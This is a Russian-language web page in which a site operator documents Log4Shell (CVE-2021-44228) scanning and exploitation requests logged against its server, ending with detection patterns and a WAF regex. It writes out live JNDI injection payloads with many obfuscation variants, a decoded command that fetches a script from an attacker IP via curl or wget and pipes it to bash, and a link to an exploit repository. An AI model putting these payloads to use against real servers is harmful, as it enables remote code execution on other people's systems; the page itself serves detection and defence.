На странице содержится информация об уязвимости компонента Log4j, Apache. Ниже представлены примеры атак на web-сервера testsoft по обнаружению CVE-2021-44228 и попытках эксплуатации уязвимости.
167.172.233.101 – testsoft.net (этот web-сервер)
x.x.x.x – IP адрес атакующего
[attackerserver].com – DNS имя сервера атакующего.
[Base64] – кодированый запрос в формате Base64
WEB BOT REQUEST TS-122021-001
Пример http запроса:
GET /?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} HTTP/1.1 Host: testsoft.net User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} Referer: http://167.172.233.101:80/?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} Accept-Encoding: gzip Connection: close
Декодированый запрос в формате [Base64]:
(curl -s x.x.x.x:5874/167.172.233.101:443||wget -q -O- x.x.x.x:5874/167.172.233.101:443)|bash
WEB BOT REQUEST TS-122021-002
Пример http запроса:
POST /login HTTP/1.1 User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox Accept: */* Host: 167.172.233.101 Content-Type: application/x-www-form-urlencoded Content-length: 46 data=${jndi:ldap://x.x.x.x:1389/Exploit}
WEB BOT REQUEST TS-122021-003
Пример http запроса:
GET / HTTP/1.1 User-Agent: ${jndi:ldap://x.x.x.x:1389/Exploit} Host: 167.172.233.101
WEB BOT REQUEST TS-122021-004
Пример http запроса:
GET /${jndi:ldap://x.x.x.x:1389/Exploit} HTTP/1.1 User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox Host: 167.172.233.101 Cookie: test='${jndi:ldap://x.x.x.x:1389/Exploit}'
WEB BOT REQUEST TS-122021-005-EXT
Пример http запроса:
GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.[attackerserver].com%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.[attackerserver].com%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.[attackerserver].com%2F%7D HTTP/1.1 Host: testsoft.net User-Agent: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.[attackerserver].com/} Connection: close Transfer-Encoding: chunked A-IM: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_A-IM.log4jdns.[attackerserver].com/} Accept: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept.log4jdns.[attackerserver].com/} Accept-Charset: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Charset.log4jdns.[attackerserver].com/} Accept-Datetime: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Datetime.log4jdns.[attackerserver].com/} Accept-Encoding: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Encoding.log4jdns.[attackerserver].com/} Accept-Language: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Language.log4jdns.[attackerserver].com/} Access-Control-Request-Headers: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Headers.log4jdns.[attackerserver].com/} Access-Control-Request-Method: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Method.log4jdns.[attackerserver].com/} Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Authorization.log4jdns.[attackerserver].com/} Cache-Control: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cache-Control.log4jdns.[attackerserver].com/} Connection: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Connection.log4jdns.[attackerserver].com/} Content-Type: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Content-Type.log4jdns.[attackerserver].com/} Cookie: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cookie.log4jdns.[attackerserver].com/} Date: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Date.log4jdns.[attackerserver].com/} Forwarded: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Forwarded.log4jdns.[attackerserver].com/} From: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_From.log4jdns.[attackerserver].com/} If-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Match.log4jdns.[attackerserver].com/} If-Modified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Modified-Since.log4jdns.[attackerserver].com/} If-None-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-None-Match.log4jdns.[attackerserver].com/} If-Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Range.log4jdns.[attackerserver].com/} If-Unmodified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Unmodified-Since.log4jdns.[attackerserver].com/} Origin: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Origin.log4jdns.[attackerserver].com/} Pragma: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Pragma.log4jdns.[attackerserver].com/} Proxy-Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Proxy-Authorization.log4jdns.[attackerserver].com/} Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Range.log4jdns.[attackerserver].com/} Referer: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.[attackerserver].com/} TE: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_TE.log4jdns.[attackerserver].com/} Upgrade: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Upgrade.log4jdns.[attackerserver].com/} Via: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Via.log4jdns.[attackerserver].com/} Warning: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Warning.log4jdns.[attackerserver].com/} ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_body.log4jdns.[attackerserver].com/}
WEB BOT REQUEST TS-122021-006-EXT
Примеры http заголовков для поиска уязвимых серверов со стороны бот-систем:
GET /?v=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2Fx.x.x.x%3A1442%2Flink%7D HTTP/1.1 Host: testsoft.net User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Accept-Encoding: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Accept: */* Connection: keep-alive Referer: https://${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Accept-Charset: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Accept-Datetime: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Accept-Language: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Forwarded-For-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} TE: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Upgrade: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Via: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Warning: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Max-Forwards: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Origin: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Pragma: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} DNT: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} Cache-Control: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-ATT-DeviceId: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Correlation-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Csrf-Token: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-CSRFToken: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Do-Not-Track: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Foo: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Foo-Bar: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-By: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-For-Original: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Host: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Port: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Protocol: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Scheme: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Server: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarded-Ssl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forwarder-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forward-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Forward-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Frame-Options: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Geoip-Country: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Http-Destinationurl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Http-Host-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Http-Method: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-HTTP-Method-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Http-Path-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Https: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Htx-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Hub-Signature: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-If-Unmodified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Imbo-Test-Config: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Insight: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Ip-Trail: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-ProxyUser-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Requested-With: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Request-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-UIDH: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link} X-XSRF-TOKEN: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Дополнительные ссылки по теме:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://tryhackme.com/room/solar
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
https://www.youtube.com/watch?v=7qoPDq41xhQ
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/README.md
https://github.com/pedrohavay/exploit-CVE-2021-44228
Известные варианты строк из аномальных запросов:
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.x.x.x/} ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://x.x.x.x/} ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x.x.x.x/} ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//x.x.x.x/} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://x.x.x.x/} ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x/} ${${::-j}ndi:rmi://x.x.x.x/} t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//x.x.x.x:1389/TomcatBypass/Command/Base64/d2d...[Base64]...mVy}') ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//167.172.233.101.[attackerserver].com/link} %24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fx.x.x.x%2Fsecurityscan%7D
Патерны для обнаружения попыток эксплуатации уязвимости Log4j:
%24%7bjndi
%2524%257Bjndi
%2F%252524%25257Bjndi%3A
${jndi:ldap:
${jndi:ldaps:
${jndi:rmi:
${jndi:ldaps:
${jndi:dns:
${jndi:nis
${jndi:nds
${jndi:corba
${jndi:iiop
${jndi:${lower:
${::-j}${
${env:BARFOO:-j}
${::-l}${::-d}${::-a}${::-p}
${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:
${upper:j}ndi:${upper:l}${upper:d}a${lower:p}:
${::-j}${::-n}${::-d}${::-i}:
$%7Bjndi:
%2F%252524%25257Bjndi%3A
base64:JHtqbmRp
j}ndi$
jndi%
jndi:
j}ndi
j%7Dndi
Пример regex строки для использования на WAF:
(?s)\$\{.+:.+\}